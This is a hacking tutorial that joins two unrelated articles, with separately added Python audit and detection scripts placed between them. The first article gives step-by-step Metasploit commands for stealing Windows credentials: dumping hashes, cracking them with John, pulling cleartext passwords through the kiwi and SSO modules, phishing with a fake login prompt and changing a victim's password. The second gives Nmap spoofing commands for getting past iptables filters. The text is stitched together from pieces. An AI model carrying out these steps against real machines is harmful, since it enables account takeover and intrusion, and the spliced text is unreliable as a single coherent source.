Post Exploitation for Remote Windows Password

In this article you will learn how to extract Windows users' passwords and change an extracted password using the Metasploit framework.

Here you need to exploit the target machine once to obtain a meterpreter session and then bypass UAC to gain admin privileges.

Requirement:

Attacker: Kali Linux

Target: Windows 7

Let’s Begin

Extracting User Account Password

1st Method

Once you have a meterpreter session on the target system, follow the steps given below:

Execute the command given below, which dumps the password hashes of all Windows users, as shown in the image below.

meterpreter > hashdump

Now copy all the hash values into a text file as shown below and save it. I had saved it as hash.txt on the desktop. It contains the hash values of 4 users with their RIDs (the last part of the SID): 500: Administrator; 501: Guest; 1001: Pentest; 1000: Raj, each with its password hash.

Send your session to the background:

meterpreter > background

Now open a new terminal and use John the Ripper to crack the hashes by executing the command given below:

john --wordlist=/root/Desktop/pass.txt --format=NT /root/Desktop/hashes.txt

/root/Desktop/pass.txt is the path of your password dictionary

/root/Desktop/hashes.txt is the path of the file containing the hash values

From the image below you can confirm that we successfully retrieved the password 123 for user raj by cracking its hash value.

2nd Method

This module will dump the local user accounts from the SAM database using the registry.

msf > use post/windows/gather/hashdump

msf post(hashdump) > set session 2

msf post(hashdump) > exploit

From the image below you can observe that we again obtained the hash values for the local user accounts; repeat the above steps to crack these values using John the Ripper.

If you look at the highlighted text you will notice that it also captured the password hint for user RAJ: “first three digits”.

3rd Method

This will dump local accounts from the SAM Database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.

msf > use post/windows/gather/smart_hashdump

msf post(smart_hashdump) > set session 2

msf post(smart_hashdump) > exploit

From the image below you can observe that we again obtained the hash values for the RAJ and Administrator accounts; repeat the above steps to crack these values using John the Ripper. Moreover, it captured the same password hint for user Raj.

4th Method

This module harvests credentials found on the host and stores them in the database.

msf > use post/windows/gather/credentials/credential_collector

msf post(credential_collector) > set session 2

msf post(credential_collector) > exploit

This module works in the same manner and dumps the hash values for the local user accounts, as shown in the image below; repeat the above steps to crack these values using John the Ripper.
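The four methods above (hashdump, post/windows/gather/hashdump, smart_hashdump and credential_collector) all produce the same pwdump-style lines, `user:RID:LM_hash:NT_hash:::`. The following is an added example, not code from the article or from the Metasploit project, that parses such a dump and audits it the way a defender reviewing their own SAM would: it flags the built-in RIDs 500 and 501, accounts with a blank password (the NT hash of the empty string), accounts that still store an LM hash, and accounts that share a password. The sample dump is constructed: the two 32-hex-digit constants are the publicly known empty LM and NT hashes, and the other hash values are placeholders, not the article's real hashes.

```python
"""Parse and audit a SAM hash dump (added example, not code from the article
or from the Metasploit project).

Each hashdump line has the pwdump form:

    username:RID:LM_hash:NT_hash:::

The sample dump below is constructed for this example.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass

# LM hash of a disabled/absent LM password and NT hash of the empty string.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
# RIDs (last component of the SID) of the built-in local accounts.
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}


@dataclass
class SamEntry:
    user: str
    rid: int
    lm_hash: str
    nt_hash: str


def parse_hashdump(text: str) -> list[SamEntry]:
    """Turn hashdump output into SamEntry records, rejecting malformed lines."""
    entries: list[SamEntry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"malformed hashdump line: {line!r}")
        user, rid, lm, nt = fields[0], fields[1], fields[2].lower(), fields[3].lower()
        if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"bad RID or hash length in line: {line!r}")
        entries.append(SamEntry(user, int(rid), lm, nt))
    return entries


def audit(entries: list[SamEntry]) -> dict[str, list[str]]:
    """Return per-user findings a defender should fix before a cracker finds them."""
    by_nt: dict[str, list[str]] = defaultdict(list)
    for e in entries:
        by_nt[e.nt_hash].append(e.user)

    findings: dict[str, list[str]] = {}
    for e in entries:
        notes: list[str] = []
        if e.rid in WELL_KNOWN_RIDS:
            notes.append(f"RID {e.rid}: {WELL_KNOWN_RIDS[e.rid]} account")
        if e.nt_hash == EMPTY_NT_HASH:
            notes.append("empty password (NT hash of the empty string)")
        if e.lm_hash != EMPTY_LM_HASH:
            notes.append("LM hash stored: legacy hash, trivially crackable")
        others = [u for u in by_nt[e.nt_hash] if u != e.user]
        if others and e.nt_hash != EMPTY_NT_HASH:
            notes.append(f"password shared with: {', '.join(others)}")
        if notes:
            findings[e.user] = notes
    return findings


# Constructed sample dump: usernames follow the article, hashes are placeholders.
SAMPLE_DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
raj:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Pentest:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1002:0a0a0a0a0a0a0a0a0a0a0a0a0a0a0a0a:fedcba9876543210fedcba9876543210:::
"""

if __name__ == "__main__":
    for user, notes in audit(parse_hashdump(SAMPLE_DUMP)).items():
        print(f"{user}: " + "; ".join(notes))
```

Blank-password accounts are excluded from the shared-password check so that Administrator and Guest are not reported as sharing a password with each other when both are simply empty.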

5th Method

This module will collect clear text Single Sign On credentials from the Local Security Authority using the Mimikatz extension. Blank passwords will not be stored in the database.

msf > use post/windows/gather/credentials/sso

msf post(sso) > set session 2

msf post(sso) > exploit

This module dumps the clear-text password of the logged-in user, as shown in the image below: user raj, password 123.

6th Method

In the meterpreter session we can load the “kiwi” extension, which works like “mimikatz” on Windows; execute the command given below:

meterpreter > load kiwi

Now run the following command, which extracts all saved credentials of the local user accounts, as shown in the image below; here too we successfully retrieved the password 123 of user raj.

meterpreter > creds_all

7th Method

This module is able to perform a phishing attack on the target by popping up a login prompt. When the user fills credentials in the login prompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and popup a login prompt when a specific process is starting.

msf > use post/windows/gather/phish_windows_credentials

msf post(phish_windows_credentials) > set session 2

msf post(phish_windows_credentials) > exploit

As described above, it launches a fake login prompt that appears genuine to the victim on the logon screen and waits for the user to enter his credentials.

At the logon screen the user gets a fake pop-up asking for his credentials; as he enters his username and password to log in to his system, the attacker in the background captures the entered credentials.

From the image below you can observe the captured credentials for user raj. The module saves the username, domain and password in a table.

Change Password of Remote System

1st Method

This module will attempt to change the password of the targeted account. The typical usage is to change a newly created account’s password on a remote host to avoid the error, ‘System error 1907 has occurred,’ which is caused when the account policy enforces a password change before the next login.

msf > use post/windows/manage/change_password

msf post(change_password) > set smbuser raj

msf post(change_password) > set old_password 123

msf post(change_password) > set new_password 987

msf post(change_password) > set session 1

msf post(change_password) > exploit 

Once you know the password of the logged-in user “raj”, you can easily change it by running the above commands. From the image below you can observe that we changed the password from 123 to 987.

2nd Method

As we know, meterpreter itself offers a set of post-exploitation options; it allows the attacker to open a command prompt on the victim's system without his permission by executing the shell command as given below.

meterpreter > shell

net user

net user raj 123

Hence in the 1st method we changed the password from 123 to 987, and now in the 2nd method we changed it back from 987 to 123 using the simple net user command in CMD, as shown in the image below.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

Understanding Guide to Nmap Firewall Scan (Part 2)

In our previous article we demonstrated “Nmap firewall scan (part 1)” by making use of iptables rules and then trying to bypass the firewall filter to perform advanced Nmap scanning; today we are going to discuss the second part of it.

Requirement

Attacker: Kali Linux

Target: Ubuntu  

Spoof MAC Address Scan

Allow TCP Packet from Specific Mac Address

If the network admin wants to allow TCP connections only from a specific MAC address and not from any other system, he can use the following iptables rules to apply a firewall filter in his network.

iptables -I INPUT -p tcp -m mac --mac-source "AA:AA:AA:AA:AA:AA" -j ACCEPT

iptables -I INPUT -p tcp -j REJECT --reject-with tcp-reset

Now when the attacker performs basic network scanning on the target's network, he is not able to enumerate the ports and running services of the victim's system.

nmap 192.168.1.117

In order to bypass the above filter, the attacker may run the netdiscover command or an nmap host scan in the Kali Linux terminal to identify the active hosts in the network. As a result he gets a table containing the MAC address and IP address of each active host in the local network.

Now either use the MAC addresses one by one in the nmap command, or save all the MAC addresses in a text file and give its path in the nmap command. To do this the attacker first needs to enable promiscuous mode on his network interface. Type the commands given below: the first enables promiscuous mode and the second runs the nmap scan.

ip link set eth0 promisc on

nmap --spoof-mac AA:AA:AA:AA:AA:AA 192.168.1.117

Hence if you are lucky enough to spoof the correct MAC address, you can easily bypass the firewall filter and establish a TCP connection with the victim's network for port enumeration.

Nice!!! If you look at the image below you will observe the open ports of the target's network.

Allow TCP Packet from Specific IP

If the network admin wants to allow TCP connections only from a specific IP address and not from any other system, he can use the following iptables rules to apply a firewall filter in his network.

iptables -I INPUT -p tcp -j REJECT --reject-with tcp-reset

iptables -I INPUT -p tcp -s 192.168.1.120 -j ACCEPT

Now when the attacker again performs basic network scanning on the target's network, he is not able to enumerate the ports and running services of the victim's system.

nmap 192.168.1.117

Spoof IP Address

In order to bypass the above filter, the attacker may again run the netdiscover command or an nmap host scan in the Kali Linux terminal to identify the active hosts in the network. As a result he gets a table containing the MAC address and IP address of each active host in the local network.

Now either use the IP addresses one by one in the nmap command, or save all the IP addresses in a text file and give its path in the nmap command, and then execute the following command:

nmap -e eth0 -S 192.168.1.120 192.168.1.117

Hence if you are lucky enough to spoof the correct IP address, you can easily bypass the firewall filter and establish a TCP connection with the victim's network for port enumeration.

Great!! If you look at the image below you will observe the open ports of the target's network.
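Both the MAC-address and the IP-address allow-lists above fail in the same way: the firewall trusts a field the sender controls. A defender can still see such scans, because a spoofed MAC arrives with the scanner's real IP and a spoofed IP arrives with the scanner's real MAC. The following is an added example, not code from the article, that reads iptables LOG output and reports an IP seen from more than one MAC, a MAC claiming more than one IP, and any source probing many distinct ports. It assumes the admin logs inbound SYNs ahead of the ACCEPT/REJECT rules with `iptables -I INPUT -p tcp --syn -j LOG --log-prefix "TCP-IN: "` (LOG and --log-prefix are real iptables features). The log lines are constructed inline: AA:AA:AA:AA:AA:AA and 192.168.1.120 are the article's allow-listed values, every other address is invented, and the function names are mine.

```python
"""Detect spoofed-source scans in iptables LOG lines (added example, not code
from the article).  Assumes a rule such as
    iptables -I INPUT -p tcp --syn -j LOG --log-prefix "TCP-IN: "
All sample addresses other than the article's AA:AA:AA:AA:AA:AA and
192.168.1.120 are constructed for this example.
"""
from __future__ import annotations

import re
from collections import defaultdict

# The LOG target prints the raw Ethernet header as MAC=dst(6):src(6):ethertype(2),
# i.e. 14 colon-separated octets = 41 characters.
LOG_RE = re.compile(
    r"MAC=(?P<mac>[0-9a-f:]{41})\s+SRC=(?P<src>\S+)\s+DST=(?P<dst>\S+)"
    r".*?PROTO=TCP\s+SPT=\d+\s+DPT=(?P<dpt>\d+)",
    re.IGNORECASE,
)


def parse_log_line(line: str) -> dict | None:
    """Extract source MAC, source IP and destination port; None if not a TCP LOG line."""
    m = LOG_RE.search(line)
    if m is None:
        return None
    octets = m["mac"].lower().split(":")
    return {"src_mac": ":".join(octets[6:12]), "src_ip": m["src"], "dport": int(m["dpt"])}


def analyse(lines: list[str], scan_threshold: int = 10) -> dict:
    """Correlate source MAC, source IP and destination ports across the log."""
    ip_to_macs: dict[str, set[str]] = defaultdict(set)
    mac_to_ips: dict[str, set[str]] = defaultdict(set)
    mac_to_ports: dict[str, set[int]] = defaultdict(set)
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        ip_to_macs[rec["src_ip"]].add(rec["src_mac"])
        mac_to_ips[rec["src_mac"]].add(rec["src_ip"])
        mac_to_ports[rec["src_mac"]].add(rec["dport"])
    return {
        # one IP arriving from several MACs: borrowed MAC or an address conflict
        "ip_multi_mac": {ip: sorted(m) for ip, m in ip_to_macs.items() if len(m) > 1},
        # one MAC claiming several IPs: borrowed IP or a multi-homed host
        "mac_multi_ip": {mac: sorted(i) for mac, i in mac_to_ips.items() if len(i) > 1},
        # one MAC probing many distinct ports: a port scan, whatever IP it claims
        "scanners": {mac: len(p) for mac, p in mac_to_ports.items() if len(p) >= scan_threshold},
    }


def _log_line(src_mac: str, src_ip: str, dport: int) -> str:
    """Constructed line in the format the Linux LOG target writes to the kernel log."""
    return (
        f"kernel: TCP-IN: IN=eth0 OUT= MAC=08:00:27:5e:1f:2a:{src_mac}:08:00 "
        f"SRC={src_ip} DST=192.168.1.117 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF "
        f"PROTO=TCP SPT=40000 DPT={dport} WINDOW=29200 RES=0x00 SYN URGP=0"
    )


ALLOWED_MAC, ALLOWED_IP = "aa:aa:aa:aa:aa:aa", "192.168.1.120"    # from the article
ATTACKER_MAC, ATTACKER_IP = "08:00:27:c0:ff:ee", "192.168.1.121"  # constructed
SCAN_PORTS = [21, 22, 23, 25, 53, 80, 110, 139, 143, 443, 445, 3389]

SAMPLE_LOG = (
    [_log_line(ALLOWED_MAC, ALLOWED_IP, 22) for _ in range(2)]      # legitimate admin SSH
    + [_log_line(ALLOWED_MAC, ATTACKER_IP, p) for p in SCAN_PORTS]   # borrowed MAC, real IP
    + [_log_line(ATTACKER_MAC, ALLOWED_IP, p) for p in SCAN_PORTS]   # real MAC, borrowed IP
)

if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG).items():
        print(key, value)
```

The MAC-keyed port count is the most robust of the three signals: the scanner can change the source IP freely, but every frame it sends on the local segment still carries a MAC, and the LOG target records it whether or not the packet was later accepted.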

Data-String Scan

Allow TCP Packet from Specific String

If the network admin wants to allow TCP connections only from a system whose packets contain a specific string, and not from other systems whose packets do not contain that special string, he can use the following iptables rules to apply a firewall filter in his network.

iptables -I INPUT -p tcp -m string --algo bm --string "Khulja sim sim" -j ACCEPT

iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset

In the above rule you can see we used “Khulja sim sim” as the special string for establishing a TCP connection. Hence only those TCP connections whose packets contain “Khulja sim sim” can be established.

Now when the attacker again performs basic network scanning on the target's network, he is not able to enumerate the ports and running services of the victim's system, because the traffic generated from his network does not contain the special string in its packets, so the firewall of the target system discards all TCP packets from the attacker's network.

nmap 192.168.1.117

If the attacker somehow sniffs the special string “Khulja sim sim” used to connect to the target's network, then he can use the --data-string argument in the nmap command to bypass the firewall.

nmap --data-string "Khulja sim sim" 192.168.1.117

Hence if you are lucky enough to sniff the correct data string, you can easily bypass the firewall filter and establish a TCP connection with the victim's network for port enumeration.

Wonderful!! If you look at the image below you will observe the open ports of the target's network.

Hex String Scan

Allow TCP Packet from Specific Hex String

If the network admin wants to allow TCP connections only from a system whose packets contain the hexadecimal value of a particular string, and not from other systems whose packets do not contain the hexadecimal value of that special string, he can use the following iptables rules to apply a firewall filter in his network.

iptables -I INPUT -p tcp -m string --algo kmp --hex-string "RAJ" -j ACCEPT

iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset

In the above rule you can see we used the hex value of “RAJ” as the special string for establishing a TCP connection. Hence only those TCP connections whose packets contain the hex value of “RAJ” can be established.

Now when the attacker again performs basic network scanning on the target's network, he is not able to enumerate the ports and running services of the victim's system, because the traffic generated from his network does not contain the hex value of the special string in its packets, so the firewall of the target system discards all TCP packets from the attacker's network.

nmap 192.168.1.117

If the attacker somehow sniffs the special string “RAJ” used to connect to the target's network, then he can use its hex value with the --data argument in the nmap command to bypass the firewall.

nmap --data "\x52\x41\x4a" 192.168.1.117

Hence if you are lucky enough to sniff the correct hex value of the particular data string, you can easily bypass the firewall filter and establish a TCP connection with the victim's network for port enumeration.

Hence, if you look at the image below you will observe the open ports of the target's network.

IP-Options Scan

Reject TCP Packets contains tcp-option

By default nmap sends 24 bytes of TCP data, of which 4 bytes are reserved for TCP options. The network admin can reject packets carrying TCP option 4 to refuse the TCP connection and so protect his network from scanning. Type the following iptables rule to reject TCP option 4 in his network:

iptables -A INPUT -p tcp --tcp-option 4 -j REJECT --reject-with tcp-reset

Now when the attacker performs a TCP connect scan [-sT] on the target's network, he is not able to enumerate the ports and running services of the victim's system: since the TCP option matches, the firewall discards the attacker's TCP packets.

nmap -sT 192.168.1.117

The IP protocol offers numerous options that can be placed in packet headers. Unlike the omnipresent TCP options, IP options are seldom seen, for security reasons. The most powerful way to specify IP options is to simply pass hexadecimal data as the argument to --ip-options.

Precede every hex byte value with \x. You may repeat certain characters by following them with an asterisk and then the number of times you wish them to repeat. For example, \x01\x07\x04\x00*4 is the same as \x01\x07\x04\x00\x00\x00\x00; the repeated \x00 bytes are also called NULL bytes.

Now type the following command with the --ip-options argument as shown below:

nmap --ip-options "\x00\x00\x00\x00\x00*" 192.168.1.117

Note that if you specify a number of bytes that is not a multiple of four, an incorrect IP header length will be set in the IP packet. The reason is that the IP header length field can only express multiples of four. In those cases the length is computed by dividing the header length by 4 and rounding down.
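To make the \x syntax and the multiple-of-four note concrete, here is an added example, not code from the article or from the Nmap project, that expands an --ip-options hex string exactly as described above (\xHH bytes, each optionally followed by *N), computes the IHL value the IPv4 header would carry for that many option bytes, and pads the options with End-of-Option-List bytes (option kind 0) when the total is not a multiple of four. The function names parse_hex_option, ip_header_length and pad_options are mine; the 20-byte base header, the 60-byte maximum and the IHL rounding follow the IPv4 header format.

```python
"""Parse nmap's --ip-options hex syntax and check the header-length caveat
(added example, not code from the article or from the Nmap project).
"""
import re

# One token: \xHH, optionally followed by *N to repeat that byte N times.
TOKEN_RE = re.compile(r"\\x([0-9a-fA-F]{2})(?:\*(\d+))?")

IP_HEADER_BASE = 20   # fixed IPv4 header, bytes
IP_HEADER_MAX = 60    # IHL is a 4-bit count of 32-bit words: at most 15 words
IP_OPTION_EOL = 0x00  # End of Option List, also used as padding


def parse_hex_option(spec: str) -> bytes:
    """Expand e.g. "\\x01\\x07\\x04\\x00*4" into the option bytes."""
    out = bytearray()
    pos = 0
    for m in TOKEN_RE.finditer(spec):
        if m.start() != pos:
            raise ValueError(f"unexpected text at offset {pos}: {spec[pos:m.start()]!r}")
        out += bytes.fromhex(m[1]) * int(m[2] or 1)
        pos = m.end()
    if pos != len(spec):
        # e.g. a bare '*' with no count, which the syntax described above does not allow
        raise ValueError(f"unparsed trailing text: {spec[pos:]!r}")
    return bytes(out)


def ip_header_length(options: bytes) -> dict:
    """Header length the IHL field can express for these options."""
    total = IP_HEADER_BASE + len(options)
    if total > IP_HEADER_MAX:
        raise ValueError("IPv4 options may be at most 40 bytes")
    ihl = total // 4  # rounds down, as the note above describes
    return {
        "requested": total,          # bytes actually placed in the packet
        "ihl": ihl,                  # value written to the 4-bit IHL field
        "declared": ihl * 4,         # header length a receiver will believe
        "truncated": total % 4 != 0  # True when requested != declared
    }


def pad_options(options: bytes) -> bytes:
    """Pad with EOL bytes so the header length is an exact multiple of four."""
    return options + bytes([IP_OPTION_EOL]) * (-len(options) % 4)


if __name__ == "__main__":
    opts = parse_hex_option(r"\x01\x07\x04\x00*4")
    print(opts.hex(), ip_header_length(opts))
    print(pad_options(opts).hex(), ip_header_length(pad_options(opts)))
```

With the documented example `\x01\x07\x04\x00*4` the packet carries 7 option bytes, so a 27-byte header is declared as 24 and the last three bytes fall outside what the receiver treats as header; padding to 8 bytes gives a consistent 28-byte header. The parser is strict about the syntax as described above, so a trailing `*` with no count is rejected rather than guessed at.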

GOOD! If you look at the image below you will observe the open ports of the target's network.

https://nmap.org/book/nping-man-ip-options.html
